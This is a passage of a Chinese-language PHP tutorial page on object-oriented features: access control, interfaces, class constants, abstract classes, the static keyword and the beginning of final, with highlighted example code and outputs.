这行也会产生一个致命错误</span><br><span class="hljs-variable">$obj</span>-&gt;<span class="hljs-title function_ invoke__">printHello</span>(); <span class="hljs-comment">// 输出 Public、Protected 和 Private</span><br><br><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * Define MyClass2</span><br><span class="hljs-comment"> */</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyClass2</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">MyClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-comment">// 可以对 public 和 protected 进行重定义，但 private 而不能</span><br>    <span class="hljs-keyword">protected</span> <span class="hljs-variable">$protected</span> = <span class="hljs-string">&#x27;Protected2&#x27;</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">printHello</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">public</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">protected</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">private</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$obj2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">MyClass2</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj2</span>-&gt;<span class="hljs-keyword">public</span>; <span class="hljs-comment">// 这行能被正常执行</span><br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj2</span>-&gt;<span class="hljs-keyword">private</span>; <span class="hljs-comment">// 未定义 private</span><br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj2</span>-&gt;<span class="hljs-keyword">protected</span>; <span class="hljs-comment">// 这行会产生一个致命错误</span><br><span class="hljs-variable">$obj2</span>-&gt;<span class="hljs-title function_ invoke__">printHello</span>(); <span class="hljs-comment">// 输出 Public、Protected2 和 Undefined</span><br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="方法的访问控制"><a href="#方法的访问控制" class="headerlink" title="方法的访问控制"></a>方法的访问控制</h3><p>类中的方法可以被定义为公有，私有或受保护。如果没有设置这些关键字，则该方法默认为公有。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * Define MyClass</span><br><span class="hljs-comment"> */</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-comment">// 声明一个公有的构造函数</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"></span>) </span>&#123; &#125;<br><br>    <span class="hljs-comment">// 声明一个公有的方法</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">MyPublic</span>(<span class="hljs-params"></span>) </span>&#123; &#125;<br><br>    <span class="hljs-comment">// 声明一个受保护的方法</span><br>    <span class="hljs-keyword">protected</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">MyProtected</span>(<span class="hljs-params"></span>) </span>&#123; &#125;<br><br>    <span class="hljs-comment">// 声明一个私有的方法</span><br>    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">MyPrivate</span>(<span class="hljs-params"></span>) </span>&#123; &#125;<br><br>    <span class="hljs-comment">// 此方法为公有</span><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Foo</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">MyPublic</span>();<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">MyProtected</span>();<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">MyPrivate</span>();<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$myclass</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">MyClass</span>;<br><span class="hljs-variable">$myclass</span>-&gt;<span class="hljs-title function_ invoke__">MyPublic</span>(); <span class="hljs-comment">// 这行能被正常执行</span><br><span class="hljs-variable">$myclass</span>-&gt;<span class="hljs-title function_ invoke__">MyProtected</span>(); <span class="hljs-comment">// 这行会产生一个致命错误</span><br><span class="hljs-variable">$myclass</span>-&gt;<span class="hljs-title function_ invoke__">MyPrivate</span>(); <span class="hljs-comment">// 这行会产生一个致命错误</span><br><span class="hljs-variable">$myclass</span>-&gt;<span class="hljs-title function_ invoke__">Foo</span>(); <span class="hljs-comment">// 公有，受保护，私有都可以执行</span><br><br><br><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * Define MyClass2</span><br><span class="hljs-comment"> */</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyClass2</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">MyClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-comment">// 此方法为公有</span><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Foo2</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">MyPublic</span>();<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">MyProtected</span>();<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">MyPrivate</span>(); <span class="hljs-comment">// 这行会产生一个致命错误</span><br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$myclass2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">MyClass2</span>;<br><span class="hljs-variable">$myclass2</span>-&gt;<span class="hljs-title function_ invoke__">MyPublic</span>(); <span class="hljs-comment">// 这行能被正常执行</span><br><span class="hljs-variable">$myclass2</span>-&gt;<span class="hljs-title function_ invoke__">Foo2</span>(); <span class="hljs-comment">// 公有的和受保护的都可执行，但私有的不行</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Bar</span> </span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">test</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">testPrivate</span>();<br>        <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">testPublic</span>();<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">testPublic</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Bar::testPublic\n&quot;</span>;<br>    &#125;<br>    <br>    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">testPrivate</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Bar::testPrivate\n&quot;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Foo</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">Bar</span> </span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">testPublic</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Foo::testPublic\n&quot;</span>;<br>    &#125;<br>    <br>    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">testPrivate</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Foo::testPrivate\n&quot;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$myFoo</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">foo</span>();<br><span class="hljs-variable">$myFoo</span>-&gt;<span class="hljs-title function_ invoke__">test</span>(); <span class="hljs-comment">// Bar::testPrivate </span><br>                <span class="hljs-comment">// Foo::testPublic</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="接口"><a href="#接口" class="headerlink" title="接口"></a>接口</h2><p>使用接口（interface），可以指定某个类必须实现哪些方法，但不需要定义这些方法的具体内容。</p>
<p>接口是通过 <strong>interface</strong> 关键字来定义的，就像定义一个标准的类一样，但其中定义所有的方法都是空的。</p>
<p>接口中定义的所有方法都必须是公有，这是接口的特性。</p>
<p>要实现一个接口，使用 <strong>implements</strong> 操作符。类中必须实现接口中定义的所有方法，否则会报一个致命错误。类可以实现多个接口，用逗号来分隔多个接口的名称。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">// 声明一个&#x27;iTemplate&#x27;接口</span><br><span class="hljs-class"><span class="hljs-keyword">interface</span> <span class="hljs-title">iTemplate</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">setVariable</span>(<span class="hljs-params"><span class="hljs-variable">$name</span>, <span class="hljs-variable">$var</span></span>)</span>;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getHtml</span>(<span class="hljs-params"><span class="hljs-variable">$template</span></span>)</span>;<br>&#125;<br><br><br><span class="hljs-comment">// 实现接口</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Template</span> <span class="hljs-keyword">implements</span> <span class="hljs-title">iTemplate</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$vars</span> = <span class="hljs-keyword">array</span>();<br>  <br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">setVariable</span>(<span class="hljs-params"><span class="hljs-variable">$name</span>, <span class="hljs-variable">$var</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable language_">$this</span>-&gt;vars[<span class="hljs-variable">$name</span>] = <span class="hljs-variable">$var</span>;<br>    &#125;<br>  <br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getHtml</span>(<span class="hljs-params"><span class="hljs-variable">$template</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-keyword">foreach</span>(<span class="hljs-variable language_">$this</span>-&gt;vars <span class="hljs-keyword">as</span> <span class="hljs-variable">$name</span> =&gt; <span class="hljs-variable">$value</span>) &#123;<br>            <span class="hljs-variable">$template</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27;&#123;&#x27;</span> . <span class="hljs-variable">$name</span> . <span class="hljs-string">&#x27;&#125;&#x27;</span>, <span class="hljs-variable">$value</span>, <span class="hljs-variable">$template</span>);<br>        &#125;<br> <br>        <span class="hljs-keyword">return</span> <span class="hljs-variable">$template</span>;<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="常量"><a href="#常量" class="headerlink" title="常量"></a>常量</h2><p>可以把在类中始终保持不变的值定义为常量。在定义和使用常量的时候不需要使用 $ 符号。</p>
<p>常量的值必须是一个定值，不能是变量，类属性，数学运算的结果或函数调用。</p>
<p>自 PHP 5.3.0 起，可以用一个变量来动态调用类。但该变量的值不能为关键字（如 self，parent 或 static）。</p>
<h3 id="实例-5"><a href="#实例-5" class="headerlink" title="实例"></a>实例</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">MyClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">const</span> <span class="hljs-variable constant_">constant</span> = <span class="hljs-string">&#x27;常量值&#x27;</span>;<br><br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">showConstant</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">echo</span>  <span class="hljs-built_in">self</span>::<span class="hljs-variable constant_">constant</span> . PHP_EOL;<br>    &#125;<br>&#125;<br><br><span class="hljs-keyword">echo</span> <span class="hljs-title class_">MyClass</span>::<span class="hljs-variable constant_">constant</span> . PHP_EOL;<br><br><span class="hljs-variable">$classname</span> = <span class="hljs-string">&quot;MyClass&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$classname</span>::<span class="hljs-variable constant_">constant</span> . PHP_EOL; <span class="hljs-comment">// 自 5.3.0 起</span><br><br><span class="hljs-variable">$class</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">MyClass</span>();<br><span class="hljs-variable">$class</span>-&gt;<span class="hljs-title function_ invoke__">showConstant</span>();<br><br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$class</span>::<span class="hljs-variable constant_">constant</span> . PHP_EOL; <span class="hljs-comment">// 自 PHP 5.3.0 起</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="抽象类"><a href="#抽象类" class="headerlink" title="抽象类"></a>抽象类</h2><p>任何一个类，如果它里面至少有一个方法是被声明为抽象的，那么这个类就必须被声明为抽象的。</p>
<p>定义为抽象的类不能被实例化。</p>
<p>被定义为抽象的方法只是声明了其调用方式（参数），不能定义其具体的功能实现。</p>
<p>继承一个抽象类的时候，子类必须定义父类中的所有抽象方法；另外，这些方法的访问控制必须和父类中一样（或者更为宽松）。例如某个抽象方法被声明为受保护的，那么子类中实现的方法就应该声明为受保护的或者公有的，而不能定义为私有的。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">abstract</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">AbstractClass</span></span><br><span class="hljs-class"></span>&#123;<br> <span class="hljs-comment">// 强制要求子类定义这些方法</span><br>    <span class="hljs-keyword">abstract</span> <span class="hljs-keyword">protected</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getValue</span>(<span class="hljs-params"></span>)</span>;<br>    <span class="hljs-keyword">abstract</span> <span class="hljs-keyword">protected</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">prefixValue</span>(<span class="hljs-params"><span class="hljs-variable">$prefix</span></span>)</span>;<br><br>    <span class="hljs-comment">// 普通方法（非抽象方法）</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">printOut</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">print</span> <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">getValue</span>() . PHP_EOL;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ConcreteClass1</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">AbstractClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">protected</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getValue</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;ConcreteClass1&quot;</span>;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">prefixValue</span>(<span class="hljs-params"><span class="hljs-variable">$prefix</span></span>) </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;<span class="hljs-subst">&#123;$prefix&#125;</span>ConcreteClass1&quot;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ConcreteClass2</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">AbstractClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getValue</span>(<span class="hljs-params"></span>) </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;ConcreteClass2&quot;</span>;<br>    &#125;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">prefixValue</span>(<span class="hljs-params"><span class="hljs-variable">$prefix</span></span>) </span>&#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;<span class="hljs-subst">&#123;$prefix&#125;</span>ConcreteClass2&quot;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$class1</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">ConcreteClass1</span>;<br><span class="hljs-variable">$class1</span>-&gt;<span class="hljs-title function_ invoke__">printOut</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$class1</span>-&gt;<span class="hljs-title function_ invoke__">prefixValue</span>(<span class="hljs-string">&#x27;FOO_&#x27;</span>) . PHP_EOL;<br><br><span class="hljs-variable">$class2</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">ConcreteClass2</span>;<br><span class="hljs-variable">$class2</span>-&gt;<span class="hljs-title function_ invoke__">printOut</span>();<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$class2</span>-&gt;<span class="hljs-title function_ invoke__">prefixValue</span>(<span class="hljs-string">&#x27;FOO_&#x27;</span>) . PHP_EOL;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>执行以上代码，输出结果为：</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs gcode">Co<span class="hljs-symbol">ncreteClass1</span><br>FOO_Co<span class="hljs-symbol">ncreteClass1</span><br>Co<span class="hljs-symbol">ncreteClass2</span><br>FOO_Co<span class="hljs-symbol">ncreteClass2</span><br></code></pre></td></tr></table></figure>

<p>此外，子类方法可以包含父类抽象方法中不存在的可选参数。</p>
<p>例如，子类定义了一个可选参数，而父类抽象方法的声明里没有，则也是可以正常运行的。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">abstract</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">AbstractClass</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-comment">// 我们的抽象方法仅需要定义需要的参数</span><br>    <span class="hljs-keyword">abstract</span> <span class="hljs-keyword">protected</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">prefixName</span>(<span class="hljs-params"><span class="hljs-variable">$name</span></span>)</span>;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">ConcreteClass</span> <span class="hljs-keyword">extends</span> <span class="hljs-title">AbstractClass</span></span><br><span class="hljs-class"></span>&#123;<br><br>    <span class="hljs-comment">// 我们的子类可以定义父类签名中不存在的可选参数</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">prefixName</span>(<span class="hljs-params"><span class="hljs-variable">$name</span>, <span class="hljs-variable">$separator</span> = <span class="hljs-string">&quot;.&quot;</span></span>) </span>&#123;<br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable">$name</span> == <span class="hljs-string">&quot;Pacman&quot;</span>) &#123;<br>            <span class="hljs-variable">$prefix</span> = <span class="hljs-string">&quot;Mr&quot;</span>;<br>        &#125; <span class="hljs-keyword">elseif</span> (<span class="hljs-variable">$name</span> == <span class="hljs-string">&quot;Pacwoman&quot;</span>) &#123;<br>            <span class="hljs-variable">$prefix</span> = <span class="hljs-string">&quot;Mrs&quot;</span>;<br>        &#125; <span class="hljs-keyword">else</span> &#123;<br>            <span class="hljs-variable">$prefix</span> = <span class="hljs-string">&quot;&quot;</span>;<br>        &#125;<br>        <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;<span class="hljs-subst">&#123;$prefix&#125;</span><span class="hljs-subst">&#123;$separator&#125;</span> <span class="hljs-subst">&#123;$name&#125;</span>&quot;</span>;<br>    &#125;<br>&#125;<br><br><span class="hljs-variable">$class</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">ConcreteClass</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$class</span>-&gt;<span class="hljs-title function_ invoke__">prefixName</span>(<span class="hljs-string">&quot;Pacman&quot;</span>), <span class="hljs-string">&quot;\n&quot;</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-variable">$class</span>-&gt;<span class="hljs-title function_ invoke__">prefixName</span>(<span class="hljs-string">&quot;Pacwoman&quot;</span>), <span class="hljs-string">&quot;\n&quot;</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>输出结果为：</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs">Mr. Pacman<br>Mrs. Pacwoman<br></code></pre></td></tr></table></figure>

<hr>
<h2 id="Static-关键字"><a href="#Static-关键字" class="headerlink" title="Static 关键字"></a>Static 关键字</h2><p>声明类属性或方法为 static(静态)，就可以不实例化类而直接访问。</p>
<p>静态属性不能通过一个类已实例化的对象来访问（但静态方法可以）。</p>
<p>由于静态方法不需要通过对象即可调用，所以伪变量 $this 在静态方法中不可用。</p>
<p>静态属性不可以由对象通过 -&gt; 操作符来访问。</p>
<p>自 PHP 5.3.0 起，可以用一个变量来动态调用类。但该变量的值不能为关键字 self，parent 或 static。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Foo</span> </span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-variable">$my_static</span> = <span class="hljs-string">&#x27;foo&#x27;</span>;<br>  <br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">staticValue</span>(<span class="hljs-params"></span>) </span>&#123;<br>     <span class="hljs-keyword">return</span> <span class="hljs-built_in">self</span>::<span class="hljs-variable">$my_static</span>;<br>  &#125;<br>&#125;<br><br><span class="hljs-keyword">print</span> <span class="hljs-title class_">Foo</span>::<span class="hljs-variable">$my_static</span> . PHP_EOL;<br><span class="hljs-variable">$foo</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Foo</span>();<br><br><span class="hljs-keyword">print</span> <span class="hljs-variable">$foo</span>-&gt;<span class="hljs-title function_ invoke__">staticValue</span>() . PHP_EOL;<br><span class="hljs-meta">?&gt;</span>    <br></code></pre></td></tr></table></figure>

<p>执行以上程序，输出结果为：</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">foo</span><br><span class="hljs-attribute">foo</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="Final-关键字"><a href="#Final-关键字" class="headerlink" title="Final 关键字"></a>Final 关键字</h2><p>PHP 5 新增了一个 final 关键字。如果父类中的方法被声明为 final，则子类无法覆盖该方法。如果一个类被声明为 final，则不能被继承。</p>
<p>以下代码执行会报错：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">BaseClass</span> </span>&#123;<br>   <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">test</span>(<span class="hljs-params"></span>) </span>&#123;<br>       <span class="hljs-keyword">echo</span> <span 